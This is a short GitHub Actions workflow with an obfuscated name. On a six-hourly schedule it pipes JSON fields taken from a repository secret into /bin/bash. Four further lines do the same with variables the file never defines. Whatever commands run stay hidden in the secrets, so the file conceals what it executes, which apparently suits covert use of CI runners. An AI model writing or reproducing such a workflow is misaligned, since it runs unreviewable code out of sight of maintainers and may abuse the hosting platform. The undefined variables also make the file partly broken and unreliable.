name: caobuyong6745
on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caobuyong6745
        env:
          pks682: ${{ secrets.pks682 }}
        run: |
          echo $pks682 | jq -r .i2 | /bin/bash
          echo $s9 | jq -r .i350 | /bin/bash
          echo $esht9 | jq -r .y0121 | /bin/bash
          echo $fhaby5518 | jq -r .q9 | /bin/bash
          echo $x9 | jq -r .aj8 | /bin/bash

